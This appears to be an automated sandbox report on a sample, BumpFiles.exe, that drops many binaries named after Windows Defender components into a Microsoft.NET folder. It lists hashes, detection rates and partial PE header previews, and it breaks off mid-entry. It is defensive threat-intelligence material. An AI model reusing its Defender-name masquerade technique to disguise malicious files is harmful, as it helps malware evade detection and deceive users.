                                                                  C:\Program Files (x86)\Microsoft.NET\MpClient.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):307712
                                                                  Entropy (8bit):6.332720664448543
                                                                  Encrypted:false
                                                                  SSDEEP:6144:WYtMdcvXGRDeyNF203FDpUaXCtohlikEt2U:WYtIRDflDpYos
                                                                  MD5:5C7736509CF1CC99D06D2F9ADA099A75
                                                                  SHA1:52C58A9C7CC5C0A52327F0F84B43E3984AA54135
                                                                  SHA-256:4B8D7E016AC84D73D5747CC84847F4CC0583B185FE636E3CCD3E1F713650425D
                                                                  SHA-512:539232DC40158ADA718E090A732D62FF574C1259D6F8C812911E49BD1DFCE8E406455F7160D39335893EF6C77DC3F29ABA7F0AFA75CE2E2E767C02563D347158
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 11%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._9.n1j.n1j.n1j..2k.n1j..5k.n1j..4k.n1j..5k.n1j..2k.n1j..4k.n1j..0k.n1j.n0j.n1j..8k.n1j..1k.n1j...j.n1j..3k.n1jRich.n1j........PE..d...E..e.........." ... ............L.....................................................`......................................... 1...=..$n..................$'..............h.......p...........................@...@............................................text...L........................... ..`.rdata...z.......|..................@..@.data....*...........h..............@....pdata..$'.......(...|..............@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):26721983
                                                                  Entropy (8bit):1.4876745712622361
                                                                  Encrypted:false
                                                                  SSDEEP:49152:XeQVBh0T2P8dpyCmvMXhWDyrNNmFfSewJep3V7XoJ//lKkTjyVcg:OQVVkmvahxhd1XyVc
                                                                  MD5:0F0AC6E9ABA9C88702921DB11C4B2EB8
                                                                  SHA1:9FEBA58C87C1C717918E183DF99172AF0E1118BE
                                                                  SHA-256:07A244E97090B0159C703F870D8F1B54EC3237E517118FB0318DDE982CEF2787
                                                                  SHA-512:4DDB7459752930A46174B6F460F49F40C70217FF5748C4EDB7D6D3E8F53478D2C487D1F1D575581DE42911210FA167E2A33719B3A9D5A71CE6A8124101F158E6
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......e.........." .....2<..........a;.......@..............................`J...................................... ................B.......B..T....I...... F.XS............C......................................................B.......B......................text....1<......2<................. ..`.data...x\...P<..^...6<.............@....bss....P.....A..........................idata...T....B..V....A.............@....didata.......B.......A.............@....edata........B.......A.............@..@.rdata..D.....C.......A.............@..@.reloc........C.......A.............@..B.pdata..XS... F..T....E.............@..@.rsrc.........I......TH.............@..@.............`J......*I.............@..@........................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):925848
                                                                  Entropy (8bit):6.085579436536139
                                                                  Encrypted:false
                                                                  SSDEEP:12288:kI8/UlbzMwl5E5tbcklE1WcHTWYmj8rzm/xsdO/05e7+ew7l:kIkwMPEgcHS/j8ruxsdO2FJ
                                                                  MD5:4F2C9892C74315AD23E03A84FC3C15CD
                                                                  SHA1:8F1B56DE4487610611442B91052B165AC25ACDF8
                                                                  SHA-256:09C6A18F0DEF6FB156DFF6F8EF3EAC3F27A23BE141338E21EADDA093B84AB0F2
                                                                  SHA-512:B245243360C900AAA7A47CC3AC06BF56617A9C5BBB83F9BE62C547E6A4C97DF23E677F9A7B0CADC21D3D1F82E24738D54BE1604E77F453F6FC9A4CE46B811431
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;c..Z...Z...Z..a/...Z..a/...Z..=(...Z..=(...Z..."...Z..=(...Z..=(...Z...Z...X..a/..RZ...s..Z..a/..Z..a/...Z..Rich.Z..................PE..d....P.j.........."......p...p.......b.........@..................................................... ......................................0....................T.......@......l.......p.......................(.......8..................X... ....................text....l.......p.................. ..`.rdata..n...........................@..@.data....R...@...P...@..............@....pdata...T.......`..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpCommu.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):353552
                                                                  Entropy (8bit):6.063609490596869
                                                                  Encrypted:false
                                                                  SSDEEP:6144:tdIqN/NLP6m0KBU19MCIOD6zhhsP1nhUOqM:wi/OXGhYrqM
                                                                  MD5:5C77DC919514E716498065E898A24030
                                                                  SHA1:2EF9CFF55BE5F8DF08CDD735773130EDBF6FF071
                                                                  SHA-256:69BBFE4113FAD42B74A4039EDAC0C8BEA7C558DD22C1D7A284163EFC190FDC95
                                                                  SHA-512:06D9C9AF52411DAAE72DDD9628A867F15E24F856507A54D3E3B6CDE7775BE6CB0663CF78CAD82CE1E4AC5542CE2EF4CAB88A4D770A3BEA774780543E8A6825C4
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M......................................................o.........Q......%...............R...................Rich....................PE..d...c............." ...........................f.............................P.......P....`A................................................p........0..........|,...@...%...@..........p...................(...(......8...........P................................text............................... ..`.rdata........... ..................@..@.data....#....... ..................@....pdata..|,.......0..................@..@.didat..X.... ......................@....rsrc........0....... ..............@..@.reloc.......@.......0..............@..B................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):165560
                                                                  Entropy (8bit):5.404976368456962
                                                                  Encrypted:false
                                                                  SSDEEP:1536:UMrr7HamDZjuGzV+J0fG9uKPxONFKTeWvOCzAt1di5ku1RQpy55Pxx:NKiZyGzEKoANFKTeAzAD85ku1S85r
                                                                  MD5:BF16294ABC456381F5F8C8BA7CA68933
                                                                  SHA1:762B74924FAACA7CE2DFA1DA78E5076D4FF7CF62
                                                                  SHA-256:1241F24AC9C5A111F21C5CEF831A5881A5C06229E09D158CBF2AC54E41C4E1C9
                                                                  SHA-512:3110E14522BE93B5C9B6193B29B36553A3CE81192BFC33DEA0617768873A8F23BA33260FECE074E38BF82723EEE246F1000BE61A9FDCF8A5C0A09FF08C9F47CB
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.B.X...X...X..q-...X..q-...X..-*...X..-*...X... t..X..-*...X..-*...X...X...Y..q-...X..q-...X..q-...X..Rich.X..................PE..d.....h..........."..........P.................@.............................`......FZ............... .......................................Z..................`....`...&...P..4....9..p.......................(.......8...........8................................text...e........................... ..`.rdata...].......`..................@..@.data........p.......p..............@....pdata..`...........................@..@.rsrc...............................@..@.reloc..4....P.......P..............@..B................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpDetours.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):165136
                                                                  Entropy (8bit):5.919968753776253
                                                                  Encrypted:false
                                                                  SSDEEP:3072:SbKF9Ch4oIM5qO2j+1L4BitdPhPIBcV0YnoC4PlS/KB8cV2j6jaV4:S+nCZIM1Ld7hgjWoXYcV7z
                                                                  MD5:F05E8D6365BF5A5218071548F5E687A0
                                                                  SHA1:B132FE303519E4BE50A547D6A6FE8AF359C8D335
                                                                  SHA-256:657A136378B351C50C2D60D425210021C8FE0BB9E8B998320163CC09339899AC
                                                                  SHA-512:B09B0FE1693F2B726B56CE745EF949CDE3A0D2412D763F3F84FEBAD3C4D28A0FDB6ED40CA55EFB0D8AEB5EF410402F42229F06583EC9B1572D477029141B7FFF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..............~....o....s....x..v.z.p.....L....V.....~.....6......~.....~..Rich...........................PE..d......0.........." .........................................................p......&.....`A.........................................................P.......0.......`...%...`......@...p.......................(...`...8............................................text...Bw.......................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ... ..............@..@.rsrc........P.......@..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):103672
                                                                  Entropy (8bit):5.463582216147117
                                                                  Encrypted:false
                                                                  SSDEEP:1536:9QyB1n0kg+iFMx3/TOw987XxhLTdCfDQl/0agrW7mPfp5PRnNazo:pn0k8FM5/TOw27XTdCfDW8nNPfp5pNa8
                                                                  MD5:5B57B2C8291FE382F8F87E91A19B5BB9
                                                                  SHA1:0B4224F7DA53BF49A1A822DA111464B185657A8A
                                                                  SHA-256:48732B6B8C62DAEA68F2C38EEDEEA59DA2F142403AF9EE0D8D77181BDD22BBD1
                                                                  SHA-512:4E2012B7C19319A97F4AAA7C94DD7427C850B30EAD8E679F8140AF60724AEACDFA943BA9501D456F66DB08E2325772B90F2F8E5502AB63909F5F4BED97FEC8BF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.f.>...>...>.....?......4......2......9...7...1...>...0............?...........?.....?...Rich>...........PE..d...R.L..........." .................^....................................................`A........................................0...H...x........`..`....P.......p...$...p..........p...................h...(...0...8...............0............................text............................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...`....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):373224
                                                                  Entropy (8bit):5.820010710818714
                                                                  Encrypted:false
                                                                  SSDEEP:6144:zbkK5UHrNrsedr+z0nsqBmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60R:eNgGr+Wjl
                                                                  MD5:9CA81B59C17591C8B09AF4D753A28020
                                                                  SHA1:95D7494686DFA1701FEF297944EBA28B06380931
                                                                  SHA-256:98EFF3DF7B16B9743B4F5A89F163406946E8C42229DEFCEB77E26BB5B2FF307A
                                                                  SHA-512:C782A8C01B12CBCDB77D49224D04D386E0EC68F66789C9970370CC68BDD0270ADAE8D3DE52AFF821189BC1BA96231FA283489854E3AF7D67ADEB4BDE3FA52D8D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D...%...%...%..cP...%..cP...%..?W...%..?W...%...]...%..?W...%..?Wn..%..?W...%...%...$..cP...%..cPl..%..cP...%..Rich.%..........................PE..d....3|s.........."..................9.........@.....................................}............... ......................................4...@....p.......P..H........1......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..H....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):144728
                                                                  Entropy (8bit):3.894814306787259
                                                                  Encrypted:false
                                                                  SSDEEP:768:w81RWuK37OeBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXRrL1PemM9t:wssBkG2usKfPeFz
                                                                  MD5:E49B09EAC7BD3C5B71B0F33E72A2CF34
                                                                  SHA1:61F5B81BF0C81090098806B2EF3C8EF895504AD9
                                                                  SHA-256:E9C233A28F49690339710143FDC146FAA9B73E89A8D828CC026F7246C5CED71E
                                                                  SHA-512:2E75983DD7FE9FFB73A5CCE89A6A0C19489A4ADBAC0D6B68AB53B08CF12D3D9BE7FC139E8C7B9CCD37FF07B5B24E7D9CAEDAFACFCBE3CC3351C504AA8AE564A3
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......................................................................`.......................................................... ..................X%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpOAV.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):496912
                                                                  Entropy (8bit):6.014056505362478
                                                                  Encrypted:false
                                                                  SSDEEP:6144:UTmg/KSnLsE0aGPrR4IcdwSbttHRqJULrf6KmiTVVmVVV8VVNVVVcVVVxVVVPVVQ:UxSrR4Ic7bttxqJULrTj
                                                                  MD5:82D45EE8BCA40389EA79879C75EC6207
                                                                  SHA1:86108949630649367EA91153EEE86F2FDC9F2489
                                                                  SHA-256:CE0B09D43134DD41BA555AAF18DD491EC610DD503864CAF7BFFF60AFB73F8ED5
                                                                  SHA-512:8E03CC2B53635BBA4D3AB21946C20D91B8387BE0FDEF700A893104AD5153CAF2632A1D51766DEBCA6A05C35F15B40F08A20EE52FD154938D930406C0A8F354EE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EA.G. ... ... ...U... ...R... ... ..-!...R... ...R... ...R... ...U... ...U..M ...U/.. ...U... ..Rich. ..................PE..d..............." ..........................._....................................|.....`A................................................D...x............`...#...p...%......t.......p....................8..(...P7..8............8..p............................text...2........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B........................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpProvider.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):202072
                                                                  Entropy (8bit):5.957890458465426
                                                                  Encrypted:false
                                                                  SSDEEP:3072:H/5F5VF0f8aKwRRw9XOfCAbP+A+TQ3KTeWxFYapr7Du2pe:H/5Fp0fThRRw9+fCAldmFYMpe
                                                                  MD5:4987F9EFD8B2E414801BB322400D2BFD
                                                                  SHA1:A1AAA1743D7927D667EDC74A36B1A8EFF5FE2470
                                                                  SHA-256:08789F41E50D75EADBDF097494D9AD66B26FED684501E99B5E219CA7FDE0489D
                                                                  SHA-512:FFDCEE1706AE0E02D8E79D3775EEF40E86B331CE186EEB0BB897ACF70AB85260C2AED15DBAA3AD93161A159202D1004A149A30573D5CC83AE249A3DEE17C4CBF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.:...i...i...i.r.h...i.r.h...i...i#..i.r.h...i.r.h...i.r.h...i.r.h...i.rAi...i.r.h...iRich...i........................PE..d...-.T..........." ......... ......@.....................................................`A.........................................u......Hv..,.......@...............X%......p....+..p.......................(.......@...........(................................text...l........................... ..`.rdata..&...........................@..@.data... ...........................@....pdata........... ..................@..@.rsrc...@...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpRtp.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1619192
                                                                  Entropy (8bit):6.3400930707756755
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uLLxAt3sZG5yM+SrnrwrTqfb8BPVEGAUFSCJMb1ierG:ko8ZGk8nEqfoBPqdUFrMb1ieq
                                                                  MD5:59CD6F03A00980D8ADBF42EFBB9FFFD8
                                                                  SHA1:F5471A156DDDC69799782E3FE0D72FD6E8D0F085
                                                                  SHA-256:A6D588A8EC27E9294C52BA9ABE5DD1FC7C99E129B7CAF9C19F39FF6ECA236B0A
                                                                  SHA-512:49D69D9C19342985B0E520868F7745A4B515EF2EC5778372E266978A9FE690BC3BEF37CB0CA2B513D829B82D92A4D04C8143B594ABF83A3082B86324EE6B0A8E
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P(c..I...I...I..<...I..<...I...;...I...I...H...;...I...;..=I...;...I...;...I..<...I..<...I..<...I..<...I..Rich.I..................PE..d....(~..........." .................3.........^..........................................`A........................................@............... ..hg...`..,........$..............p...................P|..(....G..8...........x|..........@....................text............................... ..`.rdata..>.... ....... ..............@..@.data....v.......`..................@....pdata..,....`.......@..............@..@.didat..x...........................@....rsrc...hg... ...p..................@..@.reloc........... ...p..............@..B................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpSvc.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3282192
                                                                  Entropy (8bit):6.315630312982859
                                                                  Encrypted:false
                                                                  SSDEEP:98304:rGo+pTlHiqauRMwGM2CEwCaCEaC3CE8CYPpCGnCqCEPCBCEPCjY:rGo+pTlHiqP/G7Y
                                                                  MD5:3767B51F5D134FD6A459F2F30C87ED14
                                                                  SHA1:33DEC014E1CB9A3B6BF4F3D037935C3E7E39904A
                                                                  SHA-256:203E41C2321D802387381D4F003EA49884A0CA0BF61ADF7D103992B0D529932C
                                                                  SHA-512:7E5AE6E6BC9E5E9A70E5A1C3B37707EDB6CE62266B59AD452E2A2F27008BA0F51661E46095130DBD04CA62C7E10F087B51F6D41FDA04CB19D0A806FE2D4A581B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......U.....zE..zE..zE..{D..zE..yD..zE..{D..zE..~D..zE..yD..zE...E..zE..{EL.zE...D!.zE..E..zE..zD..zE..sDe.zE6y.E..zE..E..zE..xD..zERich..zE........................PE..d.....;..........." ......$....................\.............................02.......2...`A...........................................d...T...|....`1.......0.<D....1..%....1.\6...r*.p.....................%.(.....$.8...........@.%..............................text...nu$.......$................. ..`.rdata...X....$..`....$.............@..@.data...............................@....pdata..<D....0..P..../.............@..@.didat.......P1.......1.............@....rsrc........`1...... 1.............@..@.reloc..\6....1..@....1.............@..B........................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):107880
                                                                  Entropy (8bit):5.399183517403788
                                                                  Encrypted:false
                                                                  SSDEEP:3072:/+V443d04OzmE9ww+vKTebKJy5zeWKGo3:/+V443d05n9rwKw5zNQ
                                                                  MD5:5020E4A4321476F7DE557F75CBC87438
                                                                  SHA1:6F135DE3D7A2FF90AF6401E5C01FCC282B0A4108
                                                                  SHA-256:41E3B40B6B8472380568BCF75FB493515DBAF63BF948F9DA9267F459D422F78F
                                                                  SHA-512:7AA722B45373F82F5ED8F6559D149E3DD72A00CB942D39BA2B0F584FF6FABFB62B1A0A52195298389CB2C698DA4E62F2D78DDE2DF46FF1183BA0F2118A2297C5
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Ql>}..P...P...P..u....P.^uS/..P.^uT/..P...Q...P.^uQ/..P.^uU/..P.^uP/..P.^uX/:.P.^u....P.^uR/..P.Rich..P.........................PE..d................." ...........................e....................................3.....`A................................................4........P.......@..d.......h%...p......0...p.......................(.......@............................................text............................... ..`.rdata...e.......p..................@..@.data...@.... ... ... ..............@....pdata..d....@.......@..............@..@.rsrc........P... ...P..............@..@.reloc.......p.......p..............@..B................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):128376
                                                                  Entropy (8bit):5.778415627793409
                                                                  Encrypted:false
                                                                  SSDEEP:3072:svVXrm01KTBVOm81W0z3J8EfKTee1YzFw/x65B:svBjiBVOmGJJ0kFaw3
                                                                  MD5:2C2714BAB4E11FD6865DDF8B501A212D
                                                                  SHA1:9B5D52CB7A6CF62B83A36566DEAD2C28B0D1A96E
                                                                  SHA-256:0C60E5D6BB49E1F85DEA4305BCB2308708A11A8A2C228D0C1F3F41BE79AF09C2
                                                                  SHA-512:73ECA7073D9ECB8015C23E494D948C1D50A32CF96D2E0190D08FD48A69F725DCE35D2A6506FAF037FB42405A55DBF22A7776068BD30811721AC086C04A65001C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]P...P...P......Q.......].......W...Y.B.@...............]...P...d.............Q......Q...RichP...................PE..d...../..........."............................@............................................................................................tj.......... ...............x%......`....<..p....................$..(...."..8...........@$...............................text...R........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata........... ..................@..@.rsrc... ...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):21776
                                                                  Entropy (8bit):4.731417909543677
                                                                  Encrypted:false
                                                                  SSDEEP:192:7rFQWgZHWAALc2Fu462TNbvRpSDBQABJw5Wayks9gICQX01k9z3AbwmN:7rFQWgZHWA1MJ16DBRJwLy/P/R9zlmN
                                                                  MD5:0613DECA278E353EBC96493895754CCE
                                                                  SHA1:D72682AE6E077DE106235D9C236B2C7F744E2DBC
                                                                  SHA-256:D84E4315C6121FA8F8D4D477FF8C70AC899EC29CF7EE10CCD1BE1A01E7E57D9E
                                                                  SHA-512:275A7A398EA6DA4284489C437D8EB0FFA3C7FEAA299235AF92CF3E8AFB78E5487337F4B5C7544C9CFBC2AAE90BAEFDF02417C6E9125BE8BA98902464AD766CD9
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d...a.n..........." ......... ...............................................0...........`A......................................................... ...............0...%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):21856
                                                                  Entropy (8bit):4.482734780628967
                                                                  Encrypted:false
                                                                  SSDEEP:192:nrWNzOWPicCroDBQABJ54pZMMBdRgjLX01k9z3AzslM1Y3qq:rWNzOWPbDBRJGTleLR9zusloYZ
                                                                  MD5:9EEE260CF0F752D4595E51AF7EBD8B6A
                                                                  SHA1:1544C414D1240AC4F8FED45551EA061CD4665721
                                                                  SHA-256:49FA47F6F2444DC2235813961ED8395D04F86B9DF3EA08882BFFED4EAD3502F4
                                                                  SHA-512:27EDB26E104294A9DB70A4B58930220694E877DF808D4838DBDC2516BAEB5BF996C759446BE18855F52D424CDB3B5BFDD26B64B087AF167ABD661FC7C5CAEE17
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d................." ......... ...............................................0......7.....`.......................................................... .. ............0..`%..............T............................................................................rdata..............................@..@.rsrc... .... ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\NisSrv.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2909208
                                                                  Entropy (8bit):6.442167136448819
                                                                  Encrypted:false
                                                                  SSDEEP:49152:LJlKh3CsTiIy0vAayl+xFJCPg3gUZ/RG6XICg:DIPlIn
                                                                  MD5:852AAE2F9F2F13FD6AECC1E1817D8BF1
                                                                  SHA1:548C65353A1A7ACFA4CCF72F94571FEEB533AB44
                                                                  SHA-256:6BFE5B785D96525C9F060474837A83434E9EEAB498A07396C5EDB7EA925BF8B9
                                                                  SHA-512:3A7F1D8FD4D0D779383697632E3B00B803E510719AA80130337EFA7C6AB94418C3DD1315B866D4E9B2F4028777DE1229B1BD8057129C89D2778DEF1F465F95D2
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C|......C|.......{.......{.......{.......q;..............{.......{U.............C|..i...C|W.....C|......Rich............................PE..d....v............".......#..........."........@..............................-.......-...`..................................................X).,.....,.H....@+.dU....+.......,..1..0.%.p....................$.(.....$.8.............$.@....N)......................text.....#.......#................. ..`.rdata...{....$.......$.............@..@.data...p.....).......).............@....pdata..dU...@+..`... *.............@..@.didat........,.......+.............@....rsrc...H.....,.......+.............@..@.reloc...1....,..@....+.............@..B................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):738576
                                                                  Entropy (8bit):6.022878886310737
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iQo3VmVdaveWcQRUtwywRXT349/gehVTef1YecoFW3h07EVd:U4VdamQRamXGef63ou0EVd
                                                                  MD5:CFC96445CC630E00935A8A74875BD45C
                                                                  SHA1:5572055932156EA9F569ACB1CFC0E714373765D6
